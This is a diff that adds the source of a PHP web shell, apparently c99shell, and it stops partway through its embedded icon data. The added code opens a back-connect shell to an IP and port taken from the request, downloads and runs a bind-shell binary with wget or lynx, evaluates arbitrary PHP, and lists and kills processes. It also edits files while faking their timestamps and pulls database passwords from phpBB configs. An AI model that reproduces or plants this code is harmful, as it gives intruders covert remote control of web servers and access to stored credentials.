+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "</a>&nbsp;&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
